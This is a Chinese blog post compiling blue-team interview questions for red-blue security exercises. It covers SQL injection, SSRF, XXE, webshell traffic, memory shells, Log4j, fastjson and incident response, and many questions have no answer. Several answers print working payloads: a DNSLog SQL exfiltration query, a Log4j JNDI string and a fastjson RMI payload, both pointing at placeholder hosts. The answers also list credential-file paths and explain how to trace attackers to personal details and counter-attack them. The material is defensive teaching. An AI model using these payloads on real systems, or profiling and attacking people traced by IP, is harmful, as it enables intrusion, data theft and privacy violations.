2023 护网面试题（适合蓝中），持续更新中...

发布时间：2025-12-09 20:59:18 浏览次数：4

1. 题目在持续收集，欢迎各位在评论区补充。
2. 题目还没来得及分类整理，后续答案整理的差不多了会做
3. 答案收集比题目慢太多了，欢迎各位大佬在评论区提供答案
4. 如果收集到的答案有不完整的或者错误的，欢迎各位大佬指正

护网面试（蓝队）

SQL 注入的原理、危害及防御措施

SQL 注入的原理：原本的 SQL 语句在与用户可控的参数经过了如拼接、替换等字符串操作后，得到一个新的 SQL 语句并被数据库解析执行，从而达到非预期的效果。

SQL 注入的危害：由于 SQL 注入是执行了非预期的 SQL 语句，所以有可能导致数据库中的大量数据泄露、甚至被删库，如果数据库开启了文件读写权限，还有可能导致服务器被写入木马等。

SQL 注入的防御：SQL 注入的防御一般从三个方向开展：1. 集成安全防御工具，如 WAF 等。通常可以拦截大部分的攻击流量，但并不绝对，存在一定的绕过风险；2. 黑白名单限制。黑名单主要体现在参数格式、参数长度、特殊字符、转义或编码后的特殊字符等，但是由于绕过方式层出不穷，黑名单很容易出现纰漏，白名单主要应用在对动态表列名、排序等场景下，仅允许指定的参数通过，安全性较高；3. 预编译SQL。也是目前最流行最有效的方案，几乎所有的持久层框架都是使用这种技术。预编译其实就是 SQL 引擎预先对 SQL 语句进行分析编译，然后再去填充参数，目前来说这种技术是可以完全防御 SQL 注入的。

SQLMap 如何 Post 请求发起扫描？

SQLMap 发送 Post 请求通常有三种方式：1. 使用 --data 参数，参数格式与 URL 参数相同，如： sqlmap -u http://xxx.xxx.xxx/login.html --data "id=1&name=xxx"； 2. 保存 Post 请求包（通常使用 bp，假设保存为 post.txt），然后使用 -r指定请求包文件，如： sqlmap -r "C:\Users\Administrator\Desktop\post.txt"；3. 扫描 form 表单，如： sqlmap -u http://xxx.xxx.xxx/login.html --forms

SQLMap 常用的参数

-u：注入目标
–data： Post 注入的参数
–form：表单注入
-r：文件读取注入（常用 Post 请求注入）
–dbs：列出库
–tables：列出表
–columns：列出列
-D：指定库
-T：指定表
-C：指定列
–os：当前系统
–current-db：当前数据库
–current-user：当前用户
–level：扫描等级
–delay：延迟
–sql-shell：写入 shell
–tamper：使用指定插件（常用绕 WAF）
–cookie：指定 cookie
–random-agent：随机 UA
–user-agent: 指定UA

SQL 注入的流量有什么特征

参数长度异常。大多数的 SQL 注入参数由于需要截断、拼接、构造等操作，会导致参数的长度比较长；

特殊字符。大多数的 SQL 注入会包含如 '、 "、)、;、#、--、<!--、/** 等用于截断或者注释 SQL 语句的特殊字符；

参数编码。对参数进行 url、base64 等类型的编码，以及类似于宽字节注入常用的 %df5c 等编码方式，都是常见的绕过手段；

SQL 关键字。通常情况下正常的 SQL 参数是不会包含如 SELECT、 UNION、 ORDER BY、 UPDATEXML、 CONCAT、 TABLE、 DATABASE、 SLEEP等 SQL 关键字的，如果流量中出现了这类关键字就需要留意了。

大量的请求。短时间之内涌入大量的请求，有很大概率是扫描工具发起的流量，需要留意识别。

SQL 报错注入的常用函数

常见的用于报错注入的函数 3 类：

XML 文档操作相关的函数： updatexml()、extractvalue()。

数学计算相关的函数：floor()、exp()

图形处理相关函数：polygon()、mutipolygon()

SQL 注入无回显的情况下，如何利用 DNSLog

以 MySQL 为例，借用 load_file 函数，构造如： select load_file(concat('\\\\', (select database()), '.xxxx.dnslog.cn\\xxx')) 的语句，即可将数据库名回显到 DNSLog 上。

如果遇到字符无法回显的问题，可以尝试 hex() 转为十六进制；

如果遇到字符太长无法完整回显的问题，可以尝试 substr 截断分段回显。

SQL 宽字节注入的原理

宽字节注入的根本原理是：代码层与数据库层的编码不一致，并且宽字节本身有“吞”ASCII字符的现象。

具体例如：在 SQL 注入时，尝试使用单引号 ' 逃逸时，发现被代码层自动加上了转义符号 \，变成了 \'，如果代码中自行添加的转义符号 \ 为 ASCII 编码，那么 \' 的十六进制就是 %5C%27，这时候，如果参数使用 ß'，十六进制就是 %DF%27，经过代码中自动为 %27 加上的转义符号 %5C 之后，参数就变成了 %DF%5C%27，而到了 MySQL 中，如果 MySQL 使用的是 GBK 编码（宽字节的一种），则会将 %DF%5C 当做一个宽字节，剩下的 %27 当做一个字符，这就导致了转移符号 %5C 被 %DF 吞掉，组成了一个新的字符，而单引号 %27 却逃过了 %5C 的转义。

MySQL 5.0 以上和 5.0 以下的区别

MySQL 5.0 引入了存储过程、触发器、视图的概念

MySQL 5.0 支持了 information_schema 表，这张表中包含了 schemata、tables、columns 等多张表（实际上是视图），存放了数据库中的库信息、表信息、列信息等。在 SQL 注入时可以利用此表快速获取表结构等信息。

MySQL 5.0 从以前的多用户单操作变为了多用户多操作

SSRF 是什么？原理是什么？

SSRF 中文名称：服务端请求伪造。是指在攻击者无权访问服务器B，服务器A有权访问服务器B的情况下，攻击者利用服务器A的漏洞，伪造成服务器A的身份向服务器B发送请求。

通常情况下，是由于服务器A中提供了类似于通过指定 URL 远程读取文件的功能，而 URL 又未做任何校验，攻击者便构造特殊的URL，以服务器A的身份发起请求。大多数情况下，是由于为服务端提供了从其他服务端获取数据的功能，但并未对目标地址进行限制。

SSRF 的危害是什么？如何防御？

SSRF 是通过伪造有权访问的服务器的身份去访问原本无权访问的服务器。

其危害主要表现为：

服务器被控制，可能被当做代理服务器进行其他恶意行为

如果访问到的是内网服务器，可能会直接扫描到内网端口和服务，访问到内网资源，横向到其他内网机器

上传恶意脚本等

如何利用 SSRF 判断目标主机存活端口

SSRF 中，使用 dict 与 http 协议可以探测到目标主机是否存活与端口开放情况。

如： ?url=dict://xxx.xxx.xxx.xxx:8080

XXE 的原理和修复建议

XXE 中文名称：XML 外部实体注入。其原理是：XML本身是允许自定义实体的，而当服务端未经管控直接解析了来自客户端的XML数据，就会造成自定义的XML 外部实体解析，从而造成文件读取、命令执行、内网扫描等危害。

修复建议：1. 禁用XML外部实体； 2. 验证用户输入内容，对 SYSTEM、PUBLIC、ENTITY等关键字进行过滤；3. 使用成熟的 WAF 之类的安全工具配置 XXE 输入规则。

XSS 权限驻留

XSS 权限驻留一般是将可以获取用户凭证的 XSS 代码写入网站登录后的页面中，通常会结合 webshell 或者存储型XSS。这样，当其他用户登入网站后，就会触发 XSS 代码从而将网站 cookies 发送到指定位置。

文件上传漏洞的原理

文件上传漏洞是在文件上传处，服务端未对文件的格式和内容进行严格的验证，导致恶意文件上传（如 webshell、可执行文件、压缩炸弹等），从而造成服务端被远控、命令执行、资源耗尽等风险。

文件上传攻击的流量特征

正常文件上传的特征。如 Content-Type、upload 等，大多数情况会是 POST 请求；

特殊的文件后缀。如脚本语言后缀（.php、.js、.sh、.py等）、动态网页后缀（.asp、.jsp等）、可执行文件后缀（.exe等）、代码包后缀（.jar、.war等）、其他特殊后缀（.php.123、py.png等疑似利用解析漏洞的后缀）

Content-Type 与文件后缀不匹配。这是一种比较常见的文件类型绕过手段。

特殊符号与编码。如\、00、\0等截断符号

Data 的大小偏大。尤其是上传文件为压缩文件时。

如何区分扫描流量和手动流量

扫描流量通常会至少有以下 4 个特点之一：1. 数量大；2. 频率快；3. 有规律；4. 持续久（在某些场景下，攻击者为了防止被发现而刻意降低了请求频率后，比较持续且有规律的流量）。除上述之外，还有一种比较常见的扫描流量，就是较多的 UCP （端口扫描）或者 HTTP HEAD（目录扫描）之类的请求，部分扫描工具为了提高速度和节约带宽通常会使用此类连接。

挖矿病毒的特征（如何识别）及处理方式

挖矿病毒最典型的特征就是会长时间占用大量的 CPU 资源。

挖矿病毒的处理方式通常按照如下流程：

任务管理器查看 CPU 占用情况（Linux 用 top 命令与 ps 命令），找出 CPU 长时间占用过高的进程，大概率就是挖矿木马（别急着直接 kill，记住进程名）；

记住进程名，定位进程所在位置，或许可以收集到一些相关信息（可以 kill 它了）；

分析安全日志、历史命令等，查找木马来源、运行时间、账户等；

检查计划任务、自启服务、开机启动项等是否有异常任务；

检查登录记录、隐藏账户、SSH 认证等是否异常，防止木马留下后门；

检查防火墙、杀毒软件等是否被篡改配置、信任指定端口、加入白名单或开始静默模式等；

查看进程观察木马被重启，如重启，重新排查计划任务等；

如不会重新启动（别急着高兴），最重要的一点，还要防止木马被再次写入才能以绝后患，所以还需要进一步对服务器进行完整扫描查杀，防止木马被再次写入。

发现 WebShell 后如何处理

如果有条件，第一步尽量先对服务器进行快照，保留案发现场

记录 webshell 的创建时间、修改时间、最近访问时间等信息，确定被入侵的大致时间

查看 webshell 源码，进一步收集 webshell 的连接方式等

删除 webshell ，必要时可以对其中的代码进行备份留存

根据时间范围，结合连接方式，重点排查此时间范围附近的 Web 日志，还原攻击路径

尝试复现漏洞，梳理攻击过程，并对其进行修复

对系统进行全面检查，如是否被写入其他 webshell（可借助 D 盾扫描工具）、可疑文件、克隆用户、计划任务等

如何根据攻击者 IP 溯源到个人信息？

利用在线网站（如ip138.com）查询 IP 归属地

通向利用在线工具，通过 IP 反查功能查询曾绑定过的域名

如果绑定了域名，通过 ICP 备案系统（https://beian.miit.gov.cn/#/Integrated/index），查询备案信息，备案信息中会包含域名主办单位（如果是个人备案，会是个人姓名）、单位性质、备案号、备案时间等信息

使用 whois 等域名查询工具，进一步收集域名所属人的邮箱、电话等信息

根据得到的姓名、地址、邮箱、电话等信息，从社交网络中（如 QQ、微信、知乎、博客、论坛等）进一步收集个人信息

如有条件，还可以通过IP地址、域名，结合已经收集到的个人信息对目标IP进行反渗透等。

WireShark 常用的过滤规则

ip.src eq 192.168.0.1：指定的来源IP
ip.dst eq 192.168.0.1：指定的目标IP
tcp.srcport eq 8080：来源端口等于 8080
tcp.port gt 3000：来源或目标端口大于 3000
tcp.len > 100：TCP 数据包大于 100
http.request.method == "GET"：HTTP 请求类型为 GET
http.request.method == "POST" && http contains "HTTP/1.0 200 OK"：HTTP 请求类型为 POST 并且包含指定内容
http.reqeust.uri matches ".php$"：基于正则匹配的过滤

遇到 DOS 如何防范？

利用负载均衡等设备有效控制流量，最大程度削弱 DOS 攻击
关闭不必要的端口，或在路由器、防火墙上拦截过滤不必要的端口
检查 IP 来源，使用 IP 黑名单对伪造 IP、已经确定的攻击方 IP 进行屏蔽
限制 SYN/ICMP 的最大流量

DOS、DDOS、CC 的区别

DOS 中文名称拒绝服务，顾名思义，就是使服务器无法响应用户的请求。最基本的 DOS 攻击手段，就是利用大量的请求占用服务器资源，从而导致服务器无法响应客户端。

DDOS 中文名称分布式拒绝服务，是 DOS 的一种延伸，可能会利用到互联网的开放性，控制大量的主机来对某一个目标进行攻击，耗尽目标服务器的带宽或者处理器资源等。

CC 是 DDOS 众多攻击手段中的一种，也是最常见的一种针对网站的攻击方式。主要是针对 Web 服务第七层协议发送攻击，通过端口扫描等途径在互联网上搜索大量的匿名代理，通过匿名代理对目标服务器发送正常的HTTP请求。主要特点是：持续性强、强度高、难防范（因为都是真实有效请求），难溯源。

Windows 和 Linux 的日志文件分别存放在什么位置

Windows 的日志默认存放在 %systemroot%\system32\config 目录下。查看日志的话可以通过运行eventvwr.msc打开【事件管理器】来查看。

安全日志：SecEvent.evt
系统日志：SysEvent.evt
应用日志：AppEvent.evt

Linux 的日志默认存放在 /var/log 目录下。

/var/log/message：内核消息及各种应用程序的公开日志（包括启动、IO错误、网络错误等）
/var/log/cron：周期性计划任务日志
/var/log/lastlog：用户最近登录事件
/var/log/wtmp：用户登录、注销及系统启动、停机事件
/var/log/btmp：失败的登录尝试及验证事件
/var/log/dmesg：引导过程中的各种事件信息
/var/log/maillog：电子邮件活动日志

入侵检测的思路

Windows 入侵排查

检查系统账号安全
- 服务器弱口令
- 服务器远程桌面协议（RDP 协议，默认 3389）
- 服务器账号检查（新增账号、隐藏账号、克隆账号、其他可疑账号）
检查异常端口、进程
检查启动项、计划任务、服务
检查系统版本、可疑目录及文件（Users、Recent）
检查系统日志（4624：登录成功、4625：登录失败、4672：超管登录、4720：创建用户）

Linux 入侵排查

检查账号安全（密码文件、影子文件、特权用户、远程用户、sudo权限用户、来宾用户等
检查历史命令（远程登录命令、创建用户命令、删除用户命令、删除文件命令等）
检查异常端口、进程
检查启动项（runlevel）、定时任务（crontal -l）、服务
检查异常文件
检查系统日志（/var/log/secure 等）

WebLogic 是哪一个端口？

WebLogic 的默认端口是 7001

NMap 常用的参数

-sP： Ping 扫描

-sS： TCP/SYN 扫描

-A：OS 检测和版本检测

常见的端口和与之对应的漏洞

21：FTP 服务漏洞
22：SSH 弱口令
25：SMTP 邮箱账号爆破
80：OWasp TOP 10 漏洞
445：MS17010 漏洞
3389： RDP 远程代码执行
6379： Redis 未授权访问
3306： MySQL 弱口令
1433： SQLServer 弱口令
1521： Oracle 弱口令
7001： WebLogic
8080： Tomcat 默认端口

对冰蝎、菜刀、蚁剑、哥斯拉的特点

菜刀：年代比较久，鼻祖级别的，曾经风靡一时，现已经逐渐被其他三个所取代

冰蝎：流量动态加密（AES128 + 随机密钥）

哥斯拉：流量加密能过大部分静态查杀和WAF（查杀和WAF也在更新，随时就可能不行了），自带各种插件

蚁剑：模块化开发，代码简单易懂，可扩展性强

冰蝎、菜刀、蚁剑、哥斯拉的流量特征

菜刀： Base64 编码发送给菜刀码，两个关键的 payload， z1、z2 可变，请求头中可能会包含 eval 函数

蚁剑：默认 UA 是 antsword xxx，经过加密混淆后为 0x 形式

冰蝎：大量的 content-type:application，流量动态 AES 加密

哥斯拉：流量全加密，从流量上看几乎没有特征

Linux 下的敏感文件或目录

认证类：/etc/passwd、/etc/shadow、/root/.ssh/id_rsa、/root/.ssh/id_rsa.pub、/root/.ssh/authorized_keys等

配置类：/etc/ssh/sshd_config、/etc/crontab、/etc/apache/httpd.conf、/var/lib/mysql/my.cnf等

日志类：/var/log、/root/.bash_history、/root/.mysql_history等

TCP/IP 的七层模型

常见的协议有哪些

常见的中间件解析漏洞有哪些

CSRF 漏洞和 SSRF 漏洞的区别

CSRF 漏洞如何防护

为什么 CSRFToken 可以防御 CSRF

CSRF 与 CORS

有使用过哪些安全设备

如何手工快速判断目标站操作系统

TCP 三次握手和四次挥手分别作了什么

TCP 和 UDP 的区别

WAF 的工作原理

文件上传如何绕过 WAF

SQL 注入如何绕过 WAF

RCE 如何绕过 WAF

常见的反序列化漏洞

常见的中间件漏洞

常见的未授权访问漏洞

常见的逻辑漏洞

Windows 常见的提权方式

Linux 常见的提权方式

应急响应的基本思路

常用的反制手段

内网的信息收集思路

Windows 常见的权限维持方式

Linux 常见的权限维持方式

黄金票据和白银票据的区别和利用方法

常见的 WebShell 管理工具

常见的 WebShell 检测工具

Hash 和 NTML Hash 的区别

拿下域控的思路

内网横向的手段

DLL 劫持的原理

主流的免杀手段有哪些

Log4j 的原理

Log4j 的正则表达式

Log4j 的反射机制

大日志如何分析

grep -A keywords xxxx.log > keywords.log

外围打点的基本流程

外围打点的常用工具

外围打点常用的漏洞

外围打点常用的 FOFA 语句

识别 CDN 的几种思路

如何判断目标操作系统

常见的中间件漏洞有哪些

Windows 创建隐藏用户

常用的可利用端口及利用方式

正向 Shell 与反向 Shell

Windows 系统和 Linux 系统的常用命令

发现某处文件上传，如何尝试绕过？

信息收集主要收集那些内容？

Linux 下权限维持的方法

Redis 未授权访问如何利用

如何根据域名查找真实 IP

Java 内存马的原理

内存马是无文件 webshell 中最常见的攻击手段之一。其基本原理就是当客户端发起请求后，服务端中如 Listener、Filter、Servlet等组件会根据请求过程做如监听、过滤、处理等操作，内存马就是利用利用这个请求过程在内存中修改已有组件或者动态注册一个新的组件，插入恶意 shell 来达到控制服务器的目的。

内存马如何查杀

内存马的查杀的流程通常如下：

检查 web 日志，查看是否有可疑流量。

检查中间件日志与中间件版本，排查是否是中间件漏洞导致的内存马攻击。

检查其他流量日志。

内存马的流量特征主要有两点：

可能会有大量的 url 相同但 params 不同且响应 200 的请求（Java Filter 和 Listener 内存马）

可能会有类似于 webshell 流量特征，但返回 200 的 url 目录下无此文件

常用的内存马查杀工具：

arthas

java-memshell-scanner

FindShell

内存马的特征识别

Java 内存马对应的本地 classloader 路径下没有 .class 文件（因为内存马的特点就是驻留在内存中的无文件式shell）

Java Filter 内存马通常优先级会比较高（因为要确保各种情况下都执行），且在 webshell 中没有配置（因为动态注册，不需要配置）

Log4J 的原理

Log4J 本身对 Jndi Lookup 的支持，使得 Log4J 在输出日志时可以使用类似于 ${jndi:xxxx} 的语句调用 jndi 服务

Jndi 在调用 ldap 服务时，如果在 ldap 服务中找不到对应资源，并且 ldap 中存储的是外部资源命名引用时，就会去指定的外部连接下载文件

Java 的类有一个特点，无参构造函数或者静态代码块中的代码，会在类加载时自动调用

结合以上三点，构造一个恶意 java 类，在静态代码块中构造恶意指令；启动一个 ladp 服务，引入外部资源（恶意类）；利用 jndi lookup 的支持，使用 logger.error("${jndi:ldap://xxx.xxx.xxx/xxx.class}") 语句调用 ldap 服务，加载指定恶意类，就会触发恶意代码的执行。

fastjson 的原理

fastjson 有一个非常好用的特色功能： AutoType，写作： @type。它本意是能够在反序列化时指定类型，从而方便后续的开发操作。这个过程中，反序列化出来的信息是通过 setXXX 方法写入 @type 指定的类中的。

而 fastjson 漏洞就是找到一个 java 包中存在的类 JdbcRowSetImpl，利用这个类支持传入 rmi 源的特点，提前开启一个 rmi 并准备好恶意 class 文件。然后构造 payload 如： {"@type":"com.sun.rowset.JdbcRowsetImpl", "dataSourceName":"rmi://xxx.xxx.xxx/xxx.class", "autoCommit": "true"}，然后让 fastjson 去对其执行反序列化操作，执行 setDataSourceName 方法，而这个方法内又执行到 setAutoCommit 方法，自动连接 rmi 获取到恶意 class 类并解析执行。

应急响应的流程

准备阶段：明确风险资产并对可能的安全问题加固

检测阶段：通过日常监控、日志等对可疑流量进行分析判断

抑制阶段：分析影响范围，限制攻击范围，安全软件隔离等手段尽可能将影响降低到最低

根除阶段：分析事件成因，找出源头并处理。如果是木马，对木马进行特征扫描分析和定位，并排除可能存在的后门

恢复阶段：对受到破坏的系统和数据进行恢复，并实时监控分析，确保运行无误的情况下可以逐步尝试恢复抑制阶段的操作

总结阶段：对攻击特征与所使用的有效手段进行记录，为后续可能遇到的同类型事件提供经验

冰蝎的通信原理

攻击者发送连接请求至服务端

服务端返回一个随机数作为密钥（目前是 16 位 MD5），存储在 $_SESSION 中返回给客户端

客户端输入待执行命令，使用上述返回的密钥进行加密（目前是 AES 128），发送至服务端

服务端解密，执行相关命令，并加密执行结果（目前是 AES 128）

客户端对执行结果解密

固定的请求字节头（dFAXQV1LORcHRQtLRlwMAhwFTAg/M 解密后： @error_reporting;\r）和固定的响应字节头（TxcWR1NNExZAD0ZaAWMIPAZjH1BFBFtHThcJSlUXWEd 解密后： {"status":"c3VjY2Vzcw==","msg":"）

默认连接密码 rebeyond，冰蝎 4.0 有一串固定密钥 e45e329feb5d925b ，是默认连接密码的 32 位 MD5 值的前 16 位

冰蝎的流量特征

Accept ： Accept: application/json, text/javascript, */*; q=0.01

Content-Type ：大量的 Content-type: Application/x-www-form-urlencoded

User-Agent ：随机的

Port：端口通常在 49700 附近

代码：webshell 固定代码，不同开发语言的 webshell 代码不同。如 $post=Decrypt(file_get_contents("php://input")); eval($post)

连接：冰蝎为了减少开销，默认使用长链接，请求头和响应头中会带有 Connection: Keep-Alive

CS 远控码的特征

端口：默认 50050

HTTPS 证书：默认证书中，别名、所有者等信息全是 CobalStrike

UA：默认 CS HTTP 流量的 UA 是 MSIE

Beacon： CS 上线时会先投递一个小 stage ，然后去 beacon server 下载 stage，通过访问默认的 uri 获取 cs 的 shellcode，从而识别到 cs beacon stagin 的特征。

大批量的邮件钓鱼已经被客户误点且发生在半小时以前，如何应急处理

预警阶段。发送全员紧急预警，提醒切勿继续中招。必要时隔离网络，防止钓鱼邮件继续扩散。

遏制阶段。提醒已中招的用户及时修改密码等敏感信息，全盘杀毒，协助排查客户个人电脑中的文件，如有木马、勒索程序、后门等，立即清除。

溯源阶段。从两个方面（发送者邮箱、钓鱼邮件源码）入手，收集发送者相关个人信息与钓鱼数据最终前往的目的服务器；信息收集、社工、IP反查、域名备案管理等手段查询目的站相关信息。

反制阶段。端口、子域名、目录扫描等手段对目标服务器进行渗透

fastjson 无法出网，该如何发送攻击

BCEL

https://www.cnblogs.com/nice0e3/p/14949148.html

隧道攻击如何排查

大量的流量分析，如何快速筛选有用的

403 Forbidden 如何渗透？

修改 Host

修改 Referer

使用代理 IP

扩展名绕过，对路径增加 ./， ../ 等

查找 APP 中的 URL 链接

遇到页面一闪而过，如何渗透？

XSS 和 CSRF 如何配合使用？

条件竞争的原理

使用并发可以对哪些点进行测试？

验证码发送

文件上传

领优惠券

反弹 Shell 的方法

WAF 的绕过姿势，分块绕 WAF 的原理？

SSH 相关的后门一般有哪些？

IPC 横向移动有哪些条件？

DLL 劫持怎么提权？劫持白名单的 DLL 如何提权？

SQL 注入空格被过滤如何绕过？

注释绕过

UDF 提权原理

UDF 提权与 MySQL 版本有什么关系？

5.5 以上不能使用 UDF 提权。并不是不能，而是因为 5.5 以上 Mysql 启动时是使用 mysql 用户，不是 root 用户，所以提权之后也是 mysql 用户而不是 root 用户

SQLMap 的 --sql-shell 和 --os-shell 的区别

SSRF 和 Redis 如何配合 getShell

00 截断的原理

eval 和 assert 如何做免杀

eval 做不了免杀，这题是个坑

如果有条件修改 .htaccess 文件，如何 getshell

JNDI 注入的原理

Shiro 550 和 721 有什么不同

TCP Flood 攻击的原理

DNS Log 网站可以用来干什么？如果用 SQL 注入配合 DNS Log 回显，需要用到哪些 SQL 函数？

load file

PAM 软链接的原理

如何收集某公司的小程序和APP

小蓝本

企查查

脉脉

enscan

Welcome To Nginx 如何渗透？

目录扫描

Fuzz

更换代理IP、UA 等

Fuzz 技术使用场景